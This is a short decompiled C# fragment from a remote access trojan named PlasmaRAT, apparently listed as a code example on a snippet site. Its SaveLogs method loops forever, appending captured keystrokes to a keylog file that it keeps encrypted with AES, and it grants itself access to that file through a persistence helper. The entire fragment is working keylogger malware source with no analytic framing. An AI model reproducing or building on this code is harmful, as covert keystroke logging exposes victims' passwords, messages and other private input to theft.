示例#1
0
 // Token: 0x0600003F RID: 63 RVA: 0x0000456C File Offset: 0x0000276C
 public static void SaveLogs()
 {
     for (;;)
     {
         try
         {
             if (Logger.KeyLogs.Length > 150)
             {
                 Persistence.AllowAccess(Logger.KeyLogFile);
                 string str = PlasmaRAT.AES_Decrypt(File.ReadAllText(Logger.KeyLogFile));
                 File.WriteAllText(Logger.KeyLogFile, PlasmaRAT.AES_Encrypt(str + Logger.KeyLogs));
                 Logger.KeyLogs = string.Empty;
             }
         }
         catch (Exception ex)
         {
         }
         Thread.Sleep(1000);
     }
 }